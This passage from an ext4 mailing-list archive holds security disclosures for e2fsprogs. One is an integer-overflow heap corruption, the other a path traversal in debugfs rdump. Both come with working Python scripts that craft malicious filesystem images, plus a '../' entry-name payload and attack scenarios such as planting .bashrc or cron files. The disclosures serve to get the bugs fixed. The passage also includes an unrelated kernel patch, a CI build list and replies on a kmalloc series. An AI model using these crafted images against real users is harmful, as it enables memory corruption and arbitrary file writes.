   is `int`, cast to `size_t` becomes ~2^64 - 16384 → **massive heap
   buffer overflow**.
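
The arithmetic in the chain above can be checked with a short Python
sketch. It models only the 32-bit wraparound and the `int` to `size_t`
conversion by masking; it is not libext2fs code. The helper names `u32`
and `as_size_t` are illustrative, and a 64-bit `size_t` is assumed.

```python
# Minimal model of the crash-chain arithmetic (not libext2fs code).
# Assumes a 32-bit unsigned int and a 64-bit size_t.

def u32(x):
    """Wrap x the way a C unsigned int multiplication would."""
    return x & 0xFFFFFFFF

def as_size_t(x):
    """Model converting a (possibly negative) int to a 64-bit size_t."""
    return x & 0xFFFFFFFFFFFFFFFF

BLOCKSIZE = 65536
INODE_SIZE = 16384
INODES_PER_GROUP = 262145

# Step 1: the product wraps, so the inode table appears to be 1 block long.
truncated = u32(INODES_PER_GROUP * INODE_SIZE)
ibpg_buggy = (truncated + BLOCKSIZE - 1) // BLOCKSIZE
ibpg_correct = (INODES_PER_GROUP * INODE_SIZE + BLOCKSIZE - 1) // BLOCKSIZE

# Step 2: that single block holds only this many inodes.
inodes_in_buffer = ibpg_buggy * BLOCKSIZE // INODE_SIZE

# Steps 3-4: consuming one inode more than the buffer holds drives the
# remaining-byte counter negative; as a size_t it becomes a huge length.
bytes_left = ibpg_buggy * BLOCKSIZE - (inodes_in_buffer + 1) * INODE_SIZE
memcpy_len = as_size_t(bytes_left)

print(hex(truncated), ibpg_buggy, ibpg_correct)   # 0x4000 1 65537
print(inodes_in_buffer, bytes_left, memcpy_len)   # 4 -16384 18446744073709535232
```

The last number is 2^64 - 16384, which matches the size reported as
`-16384` in the ASAN output when read as a signed value.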

## Proof of Concept

### ASAN crash output

```
==8==ERROR: AddressSanitizer: negative-size-param: (size=-16384)
    #0 __interceptor_memcpy
    #1 memcpy /usr/include/aarch64-linux-gnu/bits/string_fortified.h:29
    #2 ext2fs_get_next_inode_full /src/lib/ext2fs/inode.c:659
    #3 ext2fs_get_next_inode /src/lib/ext2fs/inode.c:749
    #4 do_lsdel /src/debugfs/lsdel.c:182
```

### Reproduction

```bash
cd <e2fsprogs-source>
docker build -f Dockerfile.repro -t e2fsprogs-repro .
docker run --rm e2fsprogs-repro bash -c \
  'python3 /work/repro/craft_inode_overflow.py /work/t.img && \
   /src/debugfs/debugfs /work/t.img -R lsdel'
```

### PoC script

```python
#!/usr/bin/env python3
"""
Craft ext4 image that triggers inode_blocks_per_group integer overflow.

The key insight: s_inodes_per_group * s_inode_size must overflow 32 bits
while individually passing all validation checks in ext2fs_open2().

Values used:
  blocksize = 65536 (s_log_block_size = 6)
  s_inode_size = 16384 (power of 2, <= blocksize)
  s_inodes_per_group = 262145 (0x40001)
  Product: 262145 * 16384 = 0x100004000 → truncates to 0x4000
  inode_blocks_per_group = 1 (should be 65537)
"""
import struct
import sys

def main():
    path = sys.argv[1]
    
    BLOCKSIZE = 65536
    LOG_BLOCK_SIZE = 6
    INODE_SIZE = 16384
    INODES_PER_GROUP = 262145
    BLOCKS_PER_GROUP = 1024
    BLOCKS_COUNT = 1024
    FIRST_DATA_BLOCK = 0
    GROUPS_COUNT = 1
    INODES_COUNT = INODES_PER_GROUP * GROUPS_COUNT
    DESC_SIZE = 32

    img_size = BLOCKS_COUNT * BLOCKSIZE
    img = bytearray(img_size)

    # --- Superblock at offset 1024 ---
    sb_off = 1024
    struct.pack_into('<I', img, sb_off + 0, INODES_COUNT)       # s_inodes_count
    struct.pack_into('<I', img, sb_off + 4, BLOCKS_COUNT)       # s_blocks_count_lo
    struct.pack_into('<I', img, sb_off + 24, LOG_BLOCK_SIZE)    # s_log_block_size
    struct.pack_into('<I', img, sb_off + 28, LOG_BLOCK_SIZE)    # s_log_cluster_size
    struct.pack_into('<I', img, sb_off + 32, BLOCKS_PER_GROUP)  # s_blocks_per_group
    struct.pack_into('<I', img, sb_off + 36, BLOCKS_PER_GROUP)  # s_clusters_per_group
    struct.pack_into('<I', img, sb_off + 40, INODES_PER_GROUP)  # s_inodes_per_group
    struct.pack_into('<H', img, sb_off + 56, 0xEF53)            # s_magic
    struct.pack_into('<H', img, sb_off + 58, 1)                 # s_state = VALID
    struct.pack_into('<H', img, sb_off + 62, 1)                 # s_minor_rev_level
    struct.pack_into('<I', img, sb_off + 76, 1)                 # s_rev_level = DYNAMIC
    struct.pack_into('<H', img, sb_off + 88, INODE_SIZE)        # s_inode_size
    struct.pack_into('<I', img, sb_off + 96, 0x0002)            # s_feature_incompat = FILETYPE
    struct.pack_into('<I', img, sb_off + 100, 0x0003)           # s_feature_ro_compat
    struct.pack_into('<I', img, sb_off + 20, FIRST_DATA_BLOCK)  # s_first_data_block
    struct.pack_into('<H', img, sb_off + 254, DESC_SIZE)        # s_desc_size

    # --- Group descriptor at block 1 ---
    gd_off = BLOCKSIZE
    inode_table_block = 3
    struct.pack_into('<I', img, gd_off + 0, 2)                  # bg_block_bitmap
    struct.pack_into('<I', img, gd_off + 4, 2)                  # bg_inode_bitmap
    struct.pack_into('<I', img, gd_off + 8, inode_table_block)  # bg_inode_table

    with open(path, 'wb') as f:
        f.write(img)

    product = INODES_PER_GROUP * INODE_SIZE
    truncated = product & 0xFFFFFFFF
    buggy_ibpg = (truncated + BLOCKSIZE - 1) // BLOCKSIZE
    correct_ibpg = (product + BLOCKSIZE - 1) // BLOCKSIZE

    print(f"Image: {path} ({img_size} bytes)")
    print(f"  {INODES_PER_GROUP} * {INODE_SIZE} = {product} (0x{product:X})")
    print(f"  Truncated to 32-bit: {truncated} (0x{truncated:X})")
    print(f"  inode_blocks_per_group: {buggy_ibpg} (should be {correct_ibpg})")
    print(f"Trigger: debugfs {path} -R lsdel")

if __name__ == '__main__':
    main()
```

## Suggested Fix

Use 64-bit arithmetic for the multiplication:

```c
// lib/ext2fs/openfs.c:359-362
fs->inode_blocks_per_group = (((unsigned long long)
                               EXT2_INODES_PER_GROUP(fs->super) *
                               EXT2_INODE_SIZE(fs->super) +
                               EXT2_BLOCK_SIZE(fs->super) - 1) /
                              EXT2_BLOCK_SIZE(fs->super));
```

Additionally, add a validation check after the computation:

```c
if ((__u64)EXT2_INODES_PER_GROUP(fs->super) * EXT2_INODE_SIZE(fs->super)
    > (__u64)fs->inode_blocks_per_group * EXT2_BLOCK_SIZE(fs->super)) {
    retval = EXT2_ET_CORRUPT_SUPERBLOCK;
    goto cleanup;
}
```
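
As a rough check of the two changes above, the following Python sketch
redoes the computation with and without truncation and applies both the
existing limit comparison and the proposed consistency check. The limit
(65536 minus the number of inodes per block) follows the PoC script's own
derivation. `check_superblock` and its return strings are hypothetical
names used only for illustration.

```python
def inode_blocks_per_group(ipg, isize, bsize, wide=True):
    """Inode table blocks per group; wide=False models the 32-bit wrap."""
    product = ipg * isize
    if not wide:
        product &= 0xFFFFFFFF
    return (product + bsize - 1) // bsize

def check_superblock(ipg, isize, bsize, wide):
    """Apply the existing limit check, then the proposed consistency check."""
    ibpg = inode_blocks_per_group(ipg, isize, bsize, wide)
    max_ipg = 65536 - bsize // isize
    if ibpg > max_ipg:
        return "rejected: too many inode blocks"
    # Proposed check: the table must be large enough for every inode.
    if ipg * isize > ibpg * bsize:
        return "rejected: inode table too small"
    return "accepted"

crafted = (262145, 16384, 65536)
print(check_superblock(*crafted, wide=False))  # rejected: inode table too small
print(check_superblock(*crafted, wide=True))   # rejected: too many inode blocks
print(check_superblock(8192, 256, 4096, wide=True))  # accepted
```

In this model either change alone rejects the crafted values: the widened
multiplication lets the existing limit comparison fire, and the
consistency check catches the wrapped value even if the multiplication
is left as is.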

## Timeline

- 2026-06-07: Bug discovered during security audit

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #5: REPORT-path-traversal.md --]
[-- Type: text/markdown; name="REPORT-path-traversal.md", Size: 5700 bytes --]

# e2fsprogs: Path Traversal in debugfs rdump allows arbitrary file write

## Summary

`debugfs rdump` extracts files from an ext2/ext3/ext4 filesystem image
to a local directory. Directory entry names read from the on-disk image
are not sanitized for path traversal sequences (`../`). An attacker who
provides a crafted filesystem image can cause files to be written to
arbitrary locations outside the intended extraction directory when the
victim runs `rdump`.

## Affected Component

- File: `debugfs/dump.c`, function `rdump_inode()`, line 265
- Also affects `rdump_symlink()` at line 242 (symlink target from image
  used directly in `symlink()` syscall)
- Versions: all current versions including 1.47.4

## Severity

**High** — Arbitrary file write as the user running debugfs. If run as
root (common for filesystem recovery), this is full system compromise.

## Root Cause

In `rdump_inode()`, the output path is constructed by concatenating the
dump root with the directory entry name from the filesystem image:

```c
// debugfs/dump.c:265
sprintf(fullname, "%s/%s", dumproot, name);
```

The `name` variable comes from `rdump_dirent()` which reads it directly
from the on-disk `ext2_dir_entry.name` field (line 317):

```c
// debugfs/dump.c:316-318
thislen = ext2fs_dirent_name_len(dirent);
strncpy(name, dirent->name, thislen);
name[thislen] = 0;
```

No validation is performed to reject names containing `/`, `..`, or
absolute paths. When `name` is `../../etc/cron.d/evil`, the resulting
`fullname` resolves outside the dump directory.

Additionally, `rdump_symlink()` at line 242 creates a native symlink
whose target is read from the crafted image:

```c
// debugfs/dump.c:242
if (symlink(buf, fullname) == -1) { ... }
```

This allows the attacker to also create arbitrary symlinks on the host.
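
To make the escape concrete, here is a small Python sketch that models
the `sprintf` concatenation and then resolves `..` components lexically.
It is only an illustration: `rdump_target` and `escapes` are hypothetical
helpers, the dump root is assumed to be an absolute path, and symlinks
are ignored (`posixpath.normpath` does not consult the filesystem).

```python
import posixpath

def rdump_target(dumproot, name):
    """Model sprintf(fullname, "%s/%s", dumproot, name), then collapse '..'."""
    fullname = "%s/%s" % (dumproot, name)
    return posixpath.normpath(fullname)

def escapes(dumproot, name):
    """True if the resolved target lies outside the dump root."""
    root = posixpath.normpath(dumproot)
    target = rdump_target(dumproot, name)
    return posixpath.commonpath([root, target]) != root

print(rdump_target("/tmp/safe", "../../etc/cron.d/evil"))   # /etc/cron.d/evil
print(rdump_target("/home/victim/extracted", "../.bashrc")) # /home/victim/.bashrc
print(escapes("/tmp/safe", "../../tmp/escaped"))            # True
print(escapes("/tmp/safe", "notes.txt"))                    # False
```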

## Impact

An attacker crafts a filesystem image (e.g., on a USB drive or disk
image file) containing directory entries with `../` sequences in their
names. When a user extracts the image with `debugfs -R "rdump / <dir>"`,
the attacker's files are written outside the extraction directory.

Attack scenarios:
- Plant a `.bashrc` / `.profile` in the user's home directory
- Write to `/etc/cron.d/` for persistent code execution (if run as root)
- Overwrite `~/.ssh/authorized_keys` for SSH access
- Create malicious symlinks to redirect future operations

## Proof of Concept

### Setup

Build the Docker reproduction environment:

```bash
cd <e2fsprogs-source>
docker build -f Dockerfile.repro -t e2fsprogs-repro .
docker build -f Dockerfile.victim -t e2fs-victim .
```

### Reproduction

```bash
docker run --rm -it e2fs-victim
```

Inside the container:

```bash
# Check home directory — clean
ls -la /home/victim/

# Extract "USB drive" filesystem
/src/debugfs/debugfs /usb/drive.img -R "rdump / /home/victim/extracted"

# Check again — .bashrc appeared OUTSIDE extracted/
ls -la /home/victim/
cat /home/victim/.bashrc
```

**Result:** A `.bashrc` file with attacker-controlled content appears in
`/home/victim/`, not in `/home/victim/extracted/`. The crafted directory
entry `../.bashrc` escaped the dump directory.

### Manual image crafting (without Docker)

```python
#!/usr/bin/env python3
"""Craft ext2 image with path traversal directory entry."""
import struct, subprocess, sys

IMG = sys.argv[1]

# Create normal ext2 image
subprocess.run(['mke2fs', '-t', 'ext2', '-F', '-b', '1024', '-N', '128',
                '-O', '^dir_index', IMG, '4096'], check=True, capture_output=True)

# Write a payload file
with open('/tmp/_payload', 'w') as f:
    f.write('#!/bin/bash\necho PWNED\n')
subprocess.run(['debugfs', '-w', IMG, '-R', 'write /tmp/_payload testfile'],
               capture_output=True)

# Patch directory entry: rename "testfile" → "../../tmp/escaped"
with open(IMG, 'r+b') as f:
    f.seek(1024)
    sb = f.read(1024)
    bs = 1024 << struct.unpack_from('<I', sb, 24)[0]
    isz = struct.unpack_from('<H', sb, 88)[0]
    gd_off = bs * 2 if bs == 1024 else bs
    f.seek(gd_off)
    gd = f.read(64)
    itable = struct.unpack_from('<I', gd, 8)[0]
    f.seek(itable * bs + isz)  # root inode
    ri = f.read(isz)
    rblk = struct.unpack_from('<I', ri, 40)[0]
    f.seek(rblk * bs)
    dd = bytearray(f.read(bs))
    pos = 0
    while pos < bs:
        rl = struct.unpack_from('<H', dd, pos+4)[0]
        nl = dd[pos+6]
        if dd[pos+8:pos+8+nl] == b'testfile':
            evil = b'../../tmp/escaped'
            dd[pos+6] = len(evil)
            dd[pos+8:pos+8+len(evil)] = evil
            break
        if pos + rl >= bs: break
        pos += rl
    f.seek(rblk * bs)
    f.write(dd)

# Trigger: debugfs <IMG> -R "rdump / /tmp/safe"
# Result: /tmp/escaped is created outside /tmp/safe/
```

## Suggested Fix

Validate directory entry names in `rdump_dirent()` and `rdump_inode()`
before using them to construct host filesystem paths. Reject names
containing:
- `/` (slash) anywhere in the name
- `..` as a path component
- NUL bytes

Additionally, validate symlink targets in `rdump_symlink()` to prevent
creating symlinks pointing outside the extraction directory.

Example fix for `rdump_dirent()`:

```c
static int rdump_dirent(struct ext2_dir_entry *dirent, ...) {
    ...
    thislen = ext2fs_dirent_name_len(dirent);
    strncpy(name, dirent->name, thislen);
    name[thislen] = 0;

    /* Reject path traversal in directory entry names */
    if (strchr(name, '/') || strcmp(name, "..") == 0 ||
        strstr(name, "../") || strstr(name, "/..")) {
        com_err("rdump", 0,
                "skipping entry with path traversal: %s", name);
        return 0;
    }
    ...
}
```
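
The same rejection rules can be written as a standalone Python predicate,
which is convenient for testing crafted names before touching the C code.
This is a sketch only: `is_safe_dirent_name` is a hypothetical helper,
not a debugfs function, and it works on raw bytes so that NUL bytes can
be detected.

```python
def is_safe_dirent_name(name: bytes) -> bool:
    """Return True if a directory entry name is safe to append to a host path."""
    # A slash anywhere would let the name span several path components.
    if b"/" in name:
        return False
    # An embedded NUL would truncate the name once it reaches C string APIs.
    if b"\x00" in name:
        return False
    # With slashes rejected, ".." can only appear as the whole name.
    if name == b"..":
        return False
    return True

for candidate in (b"testfile", b"..", b"../../tmp/escaped", b"a\x00b", b"..hidden"):
    print(candidate, is_safe_dirent_name(candidate))
```

A name such as `..hidden` is accepted because it is an ordinary file name
that merely begins with two dots; only the exact component `..` moves up
a directory.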

## Timeline

- 2026-06-07: Bug discovered during security audit

^ permalink raw reply

* [RFC PATCH] ext4: fix false-negative overwrite check for DIO spanning extent boundaries
From: Peng Wang @ 2026-06-07 12:49 UTC (permalink / raw)
  To: tytso, adilger.kernel, libaokun, jack, ojaswin, ritesh.list,
	yi.zhang
  Cc: linux-ext4, linux-kernel, Peng Wang

ext4_overwrite_io() decides whether a direct I/O write is an overwrite
(all target blocks already allocated) so the write can proceed under a
shared inode lock.  It calls ext4_map_blocks() once and returns false
if the mapped length is shorter than the requested length.

ext4_map_blocks() maps at most one extent per call.  When a write
straddles two extents (e.g. a written extent and an adjacent unwritten
extent created by fallocate), the single call returns only the first
extent's length.  ext4_overwrite_io() then mis-classifies the write as
non-overwrite and forces the caller to cycle i_rwsem from shared to
exclusive.

On workloads where a DIO writer appends through a fallocated region
while a DIO reader tails the same file, every write that crosses a
written/unwritten extent boundary triggers an exclusive lock
acquisition.  The writer must wait for the reader's shared lock to be
released, and while waiting the RWSEM_FLAG_WAITERS bit blocks all
other shared acquirers.  This serialises all writers to queue-depth 1
and throughput collapses.

Fix by looping ext4_map_blocks() over the remaining range.  As long as
every queried extent reports allocated blocks (written or unwritten),
the function returns true and the write keeps the shared lock.

The *unwritten output now uses OR semantics across extents: set if any
block in the range is unwritten.  This is correct for the two callers:

 - (unaligned_io && unwritten) takes the exclusive lock, which is
   needed if any block requires partial-block zeroing.
 - (ilock_shared && !unwritten) selects ext4_iomap_overwrite_ops,
   which skips journal transactions and is only safe when every block
   is written/mapped.

The loop adds at most one extra ext4_map_blocks() call per extent
boundary, which is negligible compared to the lock contention it
eliminates.

Reproducer: two threads doing O_DIRECT I/O on a fallocated ext4 file.
Thread 1 appends sequentially in 4-16 KB writes.  Thread 2 reads from
the tail of the file in up to 1 MB reads.  Both use the same fd with
the file preallocated via posix_fallocate().

Tested on ext4 over NVMe, 6.6 based kernel:

                              before          after
  writer-only throughput:     399 MB/s        412 MB/s
  mixed (writer + reader):     11 MB/s        381 MB/s
  write latency (mixed):     880 us            21 us
  rwsem_down_write_slowpath
   (5 s sample, mixed):       1792              2

Signed-off-by: Peng Wang <peng_wang@linux.alibaba.com>
---
 fs/ext4/file.c | 25 ++++++++++++++++---------
 1 file changed, 16 insertions(+), 9 deletions(-)

diff --git a/fs/ext4/file.c b/fs/ext4/file.c
index eb1a323962b1..d060de8eddac 100644
--- a/fs/ext4/file.c
+++ b/fs/ext4/file.c
@@ -228,15 +228,22 @@ static bool ext4_overwrite_io(struct inode *inode,
 	map.m_len = EXT4_MAX_BLOCKS(len, pos, blkbits);
 	blklen = map.m_len;

-	err = ext4_map_blocks(NULL, inode, &map, 0);
-	if (err != blklen)
-		return false;
-	/*
-	 * 'err==len' means that all of the blocks have been preallocated,
-	 * regardless of whether they have been initialized or not. We need to
-	 * check m_flags to distinguish the unwritten extents.
-	 */
-	*unwritten = !(map.m_flags & EXT4_MAP_MAPPED);
+	*unwritten = false;
+
+	while (blklen > 0) {
+		map.m_len = blklen;
+		err = ext4_map_blocks(NULL, inode, &map, 0);
+		/*
+		 * err <= 0 means a hole or error; the write needs block
+		 * allocation so it cannot be treated as an overwrite.
+		 */
+		if (err <= 0)
+			return false;
+		if (!(map.m_flags & EXT4_MAP_MAPPED))
+			*unwritten = true;
+		blklen -= err;
+		map.m_lblk += err;
+	}
 	return true;
 }

-- 
2.43.0

^ permalink raw reply related

* [tytso-ext4:dev] BUILD SUCCESS 3ca1d19c1971ac4f25478eafb741e726bf2d5954
From: kernel test robot @ 2026-06-06  2:03 UTC (permalink / raw)
  To: Theodore Ts'o; +Cc: linux-ext4

tree/branch: https://git.kernel.org/pub/scm/linux/kernel/git/tytso/ext4.git dev
branch HEAD: 3ca1d19c1971ac4f25478eafb741e726bf2d5954  ext4: improve str2hashbuf by processing 4-byte chunks and removing function pointers

elapsed time: 1717m

configs tested: 180
configs skipped: 15

The following configs have been built successfully.
More configs may be tested in the coming days.

tested configs:
alpha                             allnoconfig    gcc-15.2.0
alpha                            allyesconfig    gcc-16.1.0
alpha                               defconfig    gcc-16.1.0
arc                               allnoconfig    gcc-15.2.0
arc                              allyesconfig    gcc-15.2.0
arc                                 defconfig    gcc-16.1.0
arc                            randconfig-001    gcc-8.5.0
arc                   randconfig-001-20260605    gcc-8.5.0
arc                            randconfig-002    gcc-8.5.0
arc                   randconfig-002-20260605    gcc-9.5.0
arm                               allnoconfig    clang-23
arm                                 defconfig    clang-23
arm                            randconfig-001    gcc-16.1.0
arm                   randconfig-001-20260605    gcc-13.4.0
arm                            randconfig-002    gcc-15.2.0
arm                   randconfig-002-20260605    gcc-8.5.0
arm                            randconfig-003    clang-23
arm                   randconfig-003-20260605    clang-23
arm                            randconfig-004    gcc-13.4.0
arm                   randconfig-004-20260605    gcc-15.2.0
arm64                            allmodconfig    clang-19
arm64                             allnoconfig    gcc-15.2.0
arm64                               defconfig    gcc-16.1.0
arm64                 randconfig-001-20260605    gcc-9.5.0
arm64                 randconfig-002-20260605    gcc-10.5.0
arm64                 randconfig-003-20260605    gcc-11.5.0
arm64                 randconfig-004-20260605    clang-23
csky                             allmodconfig    gcc-15.2.0
csky                              allnoconfig    gcc-15.2.0
csky                                defconfig    gcc-16.1.0
csky                  randconfig-001-20260605    gcc-16.1.0
csky                  randconfig-002-20260605    gcc-9.5.0
hexagon                          allmodconfig    clang-23
hexagon                           allnoconfig    clang-23
hexagon                             defconfig    clang-23
hexagon               randconfig-001-20260605    clang-20
hexagon               randconfig-002-20260605    clang-23
i386                             allmodconfig    gcc-14
i386                              allnoconfig    gcc-14
i386                             allyesconfig    gcc-14
i386                 buildonly-randconfig-001    gcc-14
i386        buildonly-randconfig-001-20260605    clang-22
i386                 buildonly-randconfig-002    clang-22
i386        buildonly-randconfig-002-20260605    clang-22
i386                 buildonly-randconfig-003    clang-22
i386        buildonly-randconfig-003-20260605    clang-22
i386                 buildonly-randconfig-004    gcc-14
i386        buildonly-randconfig-004-20260605    clang-22
i386                 buildonly-randconfig-005    gcc-14
i386        buildonly-randconfig-005-20260605    gcc-12
i386                 buildonly-randconfig-006    gcc-14
i386        buildonly-randconfig-006-20260605    gcc-14
i386                                defconfig    clang-22
i386                  randconfig-001-20260605    clang-20
i386                  randconfig-002-20260605    clang-20
i386                  randconfig-003-20260605    gcc-14
i386                  randconfig-004-20260605    gcc-14
i386                  randconfig-005-20260605    clang-20
i386                  randconfig-006-20260605    gcc-14
i386                  randconfig-007-20260605    clang-20
i386                  randconfig-011-20260605    clang-22
i386                  randconfig-012-20260605    clang-22
i386                  randconfig-013-20260605    clang-22
i386                  randconfig-014-20260605    clang-22
i386                  randconfig-015-20260605    clang-22
i386                  randconfig-016-20260605    clang-22
i386                  randconfig-017-20260605    clang-22
loongarch                        allmodconfig    clang-19
loongarch                         allnoconfig    clang-23
loongarch                           defconfig    clang-23
loongarch             randconfig-001-20260605    clang-18
loongarch             randconfig-002-20260605    gcc-16.1.0
m68k                             allmodconfig    gcc-15.2.0
m68k                              allnoconfig    gcc-15.2.0
m68k                             allyesconfig    gcc-16.1.0
m68k                                defconfig    gcc-16.1.0
microblaze                        allnoconfig    gcc-15.2.0
microblaze                       allyesconfig    gcc-15.2.0
microblaze                          defconfig    gcc-16.1.0
mips                             allmodconfig    gcc-15.2.0
mips                              allnoconfig    gcc-15.2.0
mips                             allyesconfig    gcc-15.2.0
nios2                            allmodconfig    gcc-11.5.0
nios2                             allnoconfig    gcc-11.5.0
nios2                               defconfig    gcc-11.5.0
nios2                 randconfig-001-20260605    gcc-8.5.0
nios2                 randconfig-002-20260605    gcc-8.5.0
openrisc                         allmodconfig    gcc-15.2.0
openrisc                          allnoconfig    gcc-15.2.0
openrisc                            defconfig    gcc-16.1.0
parisc                           allmodconfig    gcc-15.2.0
parisc                            allnoconfig    gcc-15.2.0
parisc                           allyesconfig    gcc-15.2.0
parisc                              defconfig    gcc-16.1.0
parisc                randconfig-001-20260605    gcc-14.3.0
parisc                randconfig-002-20260605    gcc-12.5.0
parisc64                            defconfig    gcc-16.1.0
powerpc                          allmodconfig    gcc-15.2.0
powerpc                           allnoconfig    gcc-15.2.0
powerpc               randconfig-001-20260605    gcc-8.5.0
powerpc               randconfig-002-20260605    gcc-8.5.0
powerpc64             randconfig-001-20260605    clang-23
powerpc64             randconfig-002-20260605    gcc-8.5.0
riscv                             allnoconfig    gcc-15.2.0
riscv                               defconfig    clang-23
riscv                          randconfig-001    gcc-8.5.0
riscv                 randconfig-001-20260605    gcc-8.5.0
riscv                          randconfig-002    clang-23
riscv                 randconfig-002-20260605    clang-23
s390                             allmodconfig    clang-18
s390                              allnoconfig    clang-23
s390                             allyesconfig    gcc-15.2.0
s390                                defconfig    clang-18
s390                           randconfig-001    gcc-11.5.0
s390                  randconfig-001-20260605    clang-23
s390                           randconfig-002    clang-23
s390                  randconfig-002-20260605    clang-23
sh                               allmodconfig    gcc-16.1.0
sh                                allnoconfig    gcc-15.2.0
sh                               allyesconfig    gcc-15.2.0
sh                                  defconfig    gcc-16.1.0
sh                             randconfig-001    gcc-16.1.0
sh                    randconfig-001-20260605    gcc-16.1.0
sh                             randconfig-002    gcc-14.3.0
sh                    randconfig-002-20260605    gcc-10.5.0
sparc                             allnoconfig    gcc-15.2.0
sparc                               defconfig    gcc-16.1.0
sparc                 randconfig-001-20260605    gcc-15.2.0
sparc                 randconfig-002-20260605    gcc-16.1.0
sparc64                          allmodconfig    clang-23
sparc64                             defconfig    clang-23
sparc64               randconfig-001-20260605    clang-23
sparc64               randconfig-002-20260605    clang-23
um                               allmodconfig    clang-19
um                                allnoconfig    clang-23
um                               allyesconfig    gcc-14
um                                  defconfig    clang-23
um                             i386_defconfig    gcc-14
um                    randconfig-001-20260605    clang-19
um                    randconfig-002-20260605    clang-23
um                           x86_64_defconfig    clang-23
x86_64                           allmodconfig    clang-22
x86_64                            allnoconfig    clang-20
x86_64                           allyesconfig    clang-22
x86_64               buildonly-randconfig-001    gcc-12
x86_64      buildonly-randconfig-001-20260605    gcc-14
x86_64               buildonly-randconfig-002    clang-20
x86_64      buildonly-randconfig-002-20260605    gcc-14
x86_64               buildonly-randconfig-003    gcc-14
x86_64      buildonly-randconfig-003-20260605    gcc-14
x86_64               buildonly-randconfig-004    gcc-14
x86_64      buildonly-randconfig-004-20260605    gcc-14
x86_64               buildonly-randconfig-005    gcc-14
x86_64      buildonly-randconfig-005-20260605    gcc-14
x86_64               buildonly-randconfig-006    clang-20
x86_64      buildonly-randconfig-006-20260605    gcc-14
x86_64                              defconfig    gcc-14
x86_64                randconfig-001-20260605    clang-22
x86_64                randconfig-002-20260605    clang-22
x86_64                randconfig-003-20260605    clang-22
x86_64                randconfig-004-20260605    gcc-13
x86_64                randconfig-005-20260605    clang-22
x86_64                randconfig-006-20260605    gcc-14
x86_64                randconfig-011-20260605    clang-22
x86_64                randconfig-012-20260605    gcc-14
x86_64                randconfig-013-20260605    clang-22
x86_64                randconfig-014-20260605    clang-22
x86_64                randconfig-015-20260605    gcc-14
x86_64                randconfig-016-20260605    clang-22
x86_64                randconfig-071-20260605    gcc-14
x86_64                randconfig-072-20260605    gcc-14
x86_64                randconfig-073-20260605    clang-20
x86_64                randconfig-074-20260605    gcc-14
x86_64                randconfig-075-20260605    gcc-12
x86_64                randconfig-076-20260605    gcc-14
x86_64                          rhel-9.4-rust    clang-22
xtensa                           alldefconfig    gcc-16.1.0
xtensa                            allnoconfig    gcc-15.2.0
xtensa                randconfig-001-20260605    gcc-8.5.0
xtensa                randconfig-002-20260605    gcc-8.5.0

--
0-DAY CI Kernel Test Service
https://github.com/intel/lkp-tests/wiki

* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: Matthew Wilcox @ 2026-06-05 20:54 UTC (permalink / raw)
  To: David Laight
  Cc: Theodore Tso, Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker,
	Joseph Qi, Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
	Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
	Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
	Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
	Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
	linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
	jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <20260605093332.7b067876@pumpkin>

On Fri, Jun 05, 2026 at 09:33:32AM +0100, David Laight wrote:
> On Thu, 4 Jun 2026 10:05:52 -0400
> "Theodore Tso" <tytso@mit.edu> wrote:
> 
> ...
> > I suppose we could do it with kmalloc() with some flags to
> > prevent forced reclaim / compaction, and if that fails, then fall back
> > to vmalloc().  Is there a better way?
> 
> There is already kvalloc().
> I'm not sure how hard that tries to get kmalloc() to succeed.

Please don't try to help.

* Re: [PATCH 00/17] replace __get_free_pages() call with kmalloc()
From: Zi Yan @ 2026-06-05 20:00 UTC (permalink / raw)
  To: Mike Rapoport (Microsoft)
  Cc: Jan Kara, Mark Fasheh, Joel Becker, Joseph Qi, Ryusuke Konishi,
	Viacheslav Dubeyko, Trond Myklebust, Anna Schumaker, Chuck Lever,
	Jeff Layton, NeilBrown, Olga Kornievskaia, Dai Ngo, Tom Talpey,
	Alexander Viro, Christian Brauner, Jan Kara, Dave Kleikamp,
	Theodore Ts'o, Miklos Szeredi, Andreas Hindborg, Breno Leitao,
	Kees Cook, Tigran A. Aivazian, linux-kernel, linux-fsdevel,
	ocfs2-devel, linux-nilfs, linux-nfs, jfs-discussion, linux-ext4,
	linux-mm
In-Reply-To: <20260523-b4-fs-v1-0-275e36a83f0e@kernel.org>

On 23 May 2026, at 13:54, Mike Rapoport (Microsoft) wrote:

> This is a (small) part of larger work of replacing page allocator calls
> with kmalloc.

Is the goal to get rid of __get_free_page(s)()?

Thanks.

>
> Also in git:
> https://git.kernel.org/pub/scm/linux/kernel/git/rppt/linux.git gfp-to-kmalloc/fs
>
> Signed-off-by: Mike Rapoport (Microsoft) <rppt@kernel.org>
> ---
> Mike Rapoport (Microsoft) (17):
>       quota: allocate dquot_hash with kmalloc()
>       proc: replace __get_free_page() with kmalloc()
>       ocfs2/dlm: replace __get_free_page() with kmalloc()
>       nilfs2: replace get_zeroed_page() with kzalloc()
>       NFS: replace __get_free_page() with kmalloc() in nfs_show_devname()
>       NFS: remove unused page and page2 in nfs4_replace_transport()
>       NFSD: replace __get_free_page() with kmalloc() in nfsd_buffered_readdir()
>       libfs: simple_transaction_get(): replace get_zeroed_page() with kzalloc()
>       jfs: replace __get_free_page() with kmalloc()
>       jbd2: replace __get_free_pages() with kmalloc()
>       isofs: replace __get_free_page() with kmalloc()
>       fuse: replace __get_free_page() with kmalloc()
>       fs/select: replace __get_free_page() with kmalloc()
>       fs/namespace: use __getname() to allocate mntpath buffer
>       configfs: replace __get_free_pages() with kzalloc()
>       binfmt_misc: replace __get_free_page() with kmalloc()
>       bfs: replace get_zeroed_page() with kzalloc()
>
>  fs/bfs/inode.c             |  4 ++--
>  fs/binfmt_misc.c           |  4 ++--
>  fs/configfs/file.c         |  7 +++----
>  fs/fuse/ioctl.c            |  5 +++--
>  fs/isofs/dir.c             |  5 +++--
>  fs/jbd2/journal.c          |  7 ++-----
>  fs/jfs/jfs_dtree.c         | 16 ++++++++--------
>  fs/libfs.c                 |  6 +++---
>  fs/namespace.c             |  4 ++--
